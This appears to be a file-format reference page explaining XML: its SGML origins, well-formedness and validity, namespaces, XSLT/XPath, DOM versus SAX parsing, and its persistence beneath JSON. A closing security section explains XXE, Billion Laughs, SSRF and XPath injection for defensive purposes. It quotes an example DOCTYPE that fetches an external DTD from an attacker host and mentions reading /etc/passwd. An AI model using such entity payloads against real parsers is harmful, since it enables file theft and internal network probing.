Extensible Markup Language
XML encodes structured data as nested elements with attributes in human-readable, machine-parseable plain text. Standardized by the W3C in 1998, XML underpins document formats (DOCX, SVG), RSS feeds, SOAP services, banking standards (ISO 20022), and ZATCA e-invoicing — even as JSON dominates web APIs.
Conversion not yet available. XML transformation requires XSLT or schema-aware processing — features under consideration for a future update.
Common questions
Why does my browser show 'This XML file does not appear to have any style information associated with it'?
This message appears when you open a raw XML file directly in a browser without an associated stylesheet. It is not an error — the browser simply has no instructions for visual rendering, so it displays the raw document tree instead. You commonly see this with XML sitemaps, RSS feeds, or API responses. The file itself is perfectly valid and well-formed.
What is the difference between XML and JSON?
XML uses matched opening and closing tags with attributes, supports namespaces, and offers formal schema validation through XSD. JSON uses a lighter curly-brace syntax that maps directly to programming language objects. JSON is 30 to 50 percent smaller for equivalent data and dominates modern web APIs, while XML remains essential in enterprise systems and regulated industries.
What is XXE injection and why is XML considered high-risk?
XXE injection exploits the DOCTYPE entity declaration to read server files or trigger requests to internal network resources. The Billion Laughs variant uses nested entity expansion to turn a few hundred bytes into gigabytes of memory consumption. Mitigation requires disabling external entity resolution and DTD processing in the parser configuration before handling untrusted input.
Is XML still used or has JSON replaced it?
JSON replaced XML for most web APIs, but XML remains deeply embedded in infrastructure. Every DOCX and XLSX file contains XML internally. SVG graphics, RSS feeds, Android manifests, Maven builds, banking wire transfers (ISO 20022), healthcare data (HL7 FHIR), and Saudi ZATCA e-invoicing all run on XML. The format lost surface visibility but is arguably more entrenched than ever.
What is the difference between well-formed and valid XML?
Well-formed XML follows syntax rules: proper nesting, quoted attributes, a single root element, and correct escaping of special characters. Valid XML is well-formed and additionally conforms to a schema (XSD, DTD, or RELAX NG) that defines permitted elements, attributes, and data types. A document can be well-formed without being valid.
How do I open and view an XML file?
Any web browser displays XML with a collapsible tree view. Text editors like VS Code, Notepad++, and Sublime Text provide syntax highlighting. For validation, use xmllint on the command line or an XML-aware editor like Oxygen XML Editor. XML is plain text, so even the simplest text editor can open it.
What is XSLT and how does it relate to XML?
XSLT (XSL Transformations) is a declarative language for converting XML documents into other formats. An XSLT stylesheet matches nodes in the source XML using template rules and outputs transformed content — HTML for web pages, a different XML vocabulary for system integration, or plain text for reports. XSLT is widely used in publishing workflows and enterprise data pipelines.
What makes .XML special
Descended from SGML
Before XML existed, enterprises structured documents with SGML (Standard Generalized Markup Language), an ISO standard published in 1986. SGML was powerful but notoriously complex — its full specification ran to over 500 pages, and building a conformant parser required deep expertise. When the web exploded in the mid-1990s, the W3C assembled a working group led by Jon Bosak of Sun Microsystems to create a language that kept SGML's core strengths — self-describing structure, validation, extensibility — while discarding its complexity. The result, published as a W3C Recommendation on February 10, 1998, was XML 1.0. The design committee articulated ten principles in the specification's introduction: XML shall be straightforwardly usable over the internet, support a wide variety of applications, be compatible with SGML, make it easy to write programs that process XML documents, keep optional features to an absolute minimum, be human-legible and reasonably clear, be prepared quickly, be formal and concise, be easy to create, and treat terseness as being of minimal importance. That last point explains XML's verbosity — a deliberate design choice favoring clarity over compactness.
Continue reading — full technical deep dive
Well-formedness versus validity
XML enforces two tiers of document correctness. A document is well-formed if it follows the syntax rules: every opening tag has a matching closing tag (or uses self-closing syntax), elements nest without overlapping, attribute values are quoted, and exactly one root element exists. Every conformant XML parser rejects documents that are not well-formed — there is no error-recovery mode equivalent to HTML's lenient parsing.
A document is valid if it is well-formed and also conforms to a schema that defines which elements, attributes, and data types are permitted. Three schema languages compete for this role. DTD (Document Type Definition) is the oldest, inherited from SGML, and defines element grammar using a compact notation. XML Schema (XSD), published by the W3C in 2001, adds typed validation with inheritance, complex type definitions, namespace-aware constraints, and cardinality rules that DTDs cannot express. RELAX NG, developed by James Clark and Murata Makoto, offers a simpler, more readable alternative that many developers prefer for hand-authored schemas. Most XML encountered in practice is well-formed but never validated against a schema.
Namespaces and compound documents
When a single XML document combines vocabularies from different sources — an SVG graphic embedded in an XHTML page, or invoice line items alongside digital signature elements — element names from different vocabularies might collide. XML namespaces solve this by binding prefixes to URIs. A SOAP envelope might use the SOAP namespace for its structure while the payload uses a UBL namespace for invoice elements. The xmlns attribute declares these bindings, and prefixed element names like cbc:IssueDate make the vocabulary origin explicit. Namespaces are essential in enterprise XML but are one of the features that makes XML harder to work with than JSON, which has no namespace mechanism.
Transformation and querying
XSLT (XSL Transformations) is a declarative language for converting XML documents into other formats. An XSLT stylesheet contains templates that match nodes in the source document and output transformed content — HTML for web display, a different XML vocabulary for system integration, or plain text for reporting. XSLT 1.0, published in 1999, remains widely deployed. XSLT 3.0, published in 2017, added streaming support for transforming documents larger than available memory.
XPath provides the query language that XSLT and other tools use to address nodes within an XML tree. An expression like //product[@category='electronics']/price selects price elements under product elements with a matching category attribute anywhere in the document. XPath 1.0 handles most practical queries. XQuery extends XPath into a full query language comparable to SQL for XML databases.
DOM versus SAX parsing
Two fundamental parsing strategies exist for XML. DOM (Document Object Model) parsers read the entire document and build an in-memory tree structure that applications traverse and manipulate. This is convenient for small-to-medium documents but fails on large files because the tree consumes several times the document's file size in memory. SAX (Simple API for XML) parsers stream through the document, firing callbacks for start-element, end-element, and character-data events without building a tree. SAX is essential for processing multi-gigabyte XML feeds — financial transaction logs, scientific datasets, government data dumps — where DOM parsing would exhaust available memory. StAX (Streaming API for XML) provides a pull-based alternative where the application controls iteration.
Lost the API war, powers everything underneath
XML dominated web data interchange through the early 2000s. SOAP web services wrapped XML payloads in XML envelopes with XML schemas and XML security. The complexity was staggering. When REST architecture gained traction and JSON offered a simpler, more compact alternative that mapped directly to JavaScript objects, developers migrated en masse. By 2012, JSON had overtaken XML for new web APIs. Today, roughly 78% of public APIs use JSON.
But XML never disappeared. It retreated from the visible surface layer into the infrastructure. Every DOCX, XLSX, and PPTX file is a ZIP archive containing XML documents — rename one to .zip and extract it to see the XML inside. SVG, the web's vector graphics format, is XML. RSS and Atom feeds are XML. Android layouts and manifests are XML. Maven pom.xml files build most Java projects. SAML authentication assertions are XML. Banking wire transfers use ISO 20022 XML messages. Healthcare data exchanges run on HL7 FHIR, which supports XML alongside JSON. Saudi Arabia's ZATCA e-invoicing mandate requires UBL 2.1 XML for all electronic invoices. The narrative that "XML is dead" confuses the loss of API dominance with disappearance. XML is less visible but arguably more entrenched than ever in the systems that actually move money, documents, and data.
Stability as a feature
XML 1.0 has had exactly five editions from its initial publication in 1998 to the Fifth Edition in 2008. Since then — nothing. No sixth edition, no breaking changes, no deprecations. This makes XML 1.0 one of the most stable specifications in the history of web technology. For archival and preservation contexts, where a format must remain readable for decades, this stability record is a significant advantage. The Library of Congress catalogs XML under FDD fdd000075 as a recognized preservation format.
.XML compared to alternatives
| Formats | Criteria | Winner |
|---|---|---|
| .XML vs .JSON | Verbosity JSON represents equivalent data in 30-50% fewer bytes by eliminating closing tags, attribute syntax, and namespace declarations. This makes JSON faster to parse and cheaper to transmit over networks. | JSON wins |
| .XML vs .JSON | Schema validation XSD provides typed validation with inheritance, complex type definitions, namespace-aware constraints, and cardinality rules. JSON Schema is capable but less mature for multi-namespace enterprise document validation. | XML wins |
| .XML vs .HTML | Error handling XML parsers reject malformed documents immediately — no error recovery. HTML parsers are lenient by design, silently fixing unclosed tags and nesting errors. XML's strictness catches data corruption early. | XML wins |
| .XML vs .YAML | Enterprise adoption XML dominates regulated industries — banking (ISO 20022), healthcare (HL7 FHIR), government (UBL invoicing), and legal (Akoma Ntoso). YAML is concentrated in DevOps and cloud-native tooling (Kubernetes, Docker Compose). | XML wins |
Technical reference
- MIME Type
application/xml- Developer
- World Wide Web Consortium (W3C)
- Year Introduced
- 1998
- Open Standard
- Yes — View specification
Binary Structure
XML is a text format with no binary structure or magic bytes. An XML document begins with an optional prolog: the XML declaration (<?xml version="1.0" encoding="UTF-8"?>) specifying the version and character encoding, followed by an optional DOCTYPE declaration referencing a DTD or defining inline entities. The document body consists of a single root element containing nested child elements delimited by matched start tags (<tag>) and end tags (</tag>), with empty elements using self-closing syntax (<tag/>). Elements carry attributes as name-value pairs within the start tag. Text content, CDATA sections (<![CDATA[...]]>), processing instructions (<?target data?>), and comments (<!-- ... -->) appear within or between elements. Namespaces use the xmlns attribute to partition element names into URI-identified vocabularies. UTF-8 is the default encoding; UTF-16 is also required for conformant parsers. Files may begin with a UTF-8 BOM (EF BB BF) before the declaration, though the W3C recommends against it. Well-formedness requires proper nesting, quoted attribute values, and a single root element. PRONOM identifies XML as fmt/101 using the <?xml declaration as the primary signature.
Conversion not yet available. XML transformation requires XSLT or schema-aware processing — features under consideration for a future update.
Attack Vectors
- XXE (XML External Entity) injection — DOCTYPE entity declarations can reference local files (file:///etc/passwd), internal network URLs (SSRF), or parameter entities that exfiltrate data to attacker-controlled servers. OWASP ranks XXE as a top-10 web vulnerability.
- Billion Laughs denial of service — exponentially expanding nested entity definitions (each referencing the previous ten times) consume gigabytes of RAM from a few hundred bytes of XML, crashing the parser and potentially the entire server.
- SSRF via external DTD — an XML document referencing an external DTD (<!DOCTYPE foo SYSTEM 'http://attacker.com/evil.dtd'>) causes the parser to fetch a remote resource, enabling server-side request forgery behind firewalls.
- XPath injection — user input concatenated into XPath expressions without sanitization allows authentication bypass and unauthorized data extraction from XML datastores, analogous to SQL injection for relational databases.
Mitigation: FileDex processes XML files entirely in the browser using the native DOMParser API. No external entity resolution, no DTD fetching, no server-side parsing. The browser's sandboxed context prevents filesystem access and network requests from parsed entities.
- Specification Extensible Markup Language (XML) 1.0 (Fifth Edition) — W3C Recommendation
- Registry XML (Extensible Markup Language) — Library of Congress Format Description (fdd000075)
- Registry Extensible Markup Language 1.0 (fmt/101) — The National Archives PRONOM Registry
- Industry XML External Entity Prevention Cheat Sheet — OWASP
- Specification XML Media Types — RFC 7303 (IANA Registration)